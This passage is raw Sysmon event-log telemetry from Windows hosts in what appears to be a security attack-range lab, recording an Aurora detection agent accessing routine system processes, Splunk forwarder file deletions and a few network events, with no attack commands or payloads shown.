12:23:14.926{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E317-63C7-ED05-00000000AF02}6268C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReaderUpdateService.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044040Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:14.925{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E0D1-63C7-5E05-00000000AF02}5280C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044039Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:14.924{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E0D1-63C7-5D05-00000000AF02}4176C:\Windows\system32\cmd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044038Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:14.922{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E02A-63C7-4705-00000000AF02}4708C:\Windows\system32\wbem\wmiprvse.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044037Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:14.915{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DE09-63C7-F204-00000000AF02}5228C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044036Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:14.903{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044035Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:14.864{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044034Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:14.857{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF7-63C7-B504-00000000AF02}1332C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044033Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:14.848{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF7-63C7-B104-00000000AF02}5076C:\Windows\System32\rdpclip.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044032Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:14.842{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF5-63C7-A404-00000000AF02}4616C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044031Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:14.841{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF4-63C7-A104-00000000AF02}4952C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044030Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:14.838{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA7E-63C7-F900-00000000AF02}4844C:\Windows\System32\msdtc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044029Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:14.835{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA75-63C7-F400-00000000AF02}2900C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044028Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:14.833{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044027Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:14.831{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA67-63C7-AE00-00000000AF02}4912C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044026Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:14.826{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044025Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:14.825{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA1C-63C7-7500-00000000AF02}3048C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044024Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:14.824{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA1C-63C7-7400-00000000AF02}3024C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044023Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:14.820{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA05-63C7-3E00-00000000AF02}3580C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044022Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:14.817{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA05-63C7-3B00-00000000AF02}3500C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 23542300x800000000000000044021Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:14.467{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FE93CD2F4547AA21AE6A406174855C26,SHA256=8D407F0E236A89931B110E19E30860E0575C73A2764DAB52B8BF42C0D91C18A3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000044020Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:12.116{FE4C2B44-D9F5-63C7-1300-00000000AF02}1036C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56369-false209.197.3.8vip0x008.map2.ssl.hwcdn.net80http 23542300x800000000000000016799Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:14.404{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E194E60B69AED0C03CAFF5BA6F1971B6,SHA256=E90FCD78F03BA7A87B57B1F3A5D01AA4909C40280C6FF1A3E394D03A906C38ED,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000044019Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:14.300{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2C00-00000000AF02}1648C:\Windows\System32\vds.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044018Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:14.299{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2A00-00000000AF02}2844C:\Windows\system32\wbem\unsecapp.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 23542300x800000000000000016800Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:15.487{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A1A8C63C24676AFDAFDBE028D3F6F3ED,SHA256=AA2AC71257975BDA03C55AC9E0EE909190D03A998572C1B82865AFA5BF09263F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000044055Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:15.499{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-D9F5-63C7-1000-00000000AF02}404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044054Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:15.499{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-D9F5-63C7-1000-00000000AF02}404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000016802Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:16.573{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D2A65755D71E89B6F0E80D1A37E48BB5,SHA256=9311910A8FBD942CA4BB2EEA88C418A4D6CD979A40A8FF6320F79CB322123594,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044058Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:16.533{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=55CDA1210466215F339819B1DF22DF0D,SHA256=3E685A497AD099A0B60086EC90BD2477347276EC39A753832AF4AE578C207D48,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000016801Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:16.431{E5A8D418-DC43-63C7-1200-00000000B002}1012NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=126D8BEC02331589DF715254539DE8DF,SHA256=414704EF1247526C9CEB2C6D67565CF8347ADADE9D05A006EBA84E8667952AF0,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000044057Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:13.761{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local61920- 23542300x800000000000000044056Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:16.026{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CBED180CB8BA128EFCE7DEA95EA9BFF4,SHA256=BBD7E0757D1D229A7312654F80C6A0DF7F6C9B73D520022C261FDD7C59C0697C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000016803Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:17.652{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6680D719AD8959059F202FFAF3FD8C51,SHA256=941BDE54371A560BC91F16CA9A42C55FE77D75A396DC8C88E2AF9E3F34DBEC56,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044060Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:17.651{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 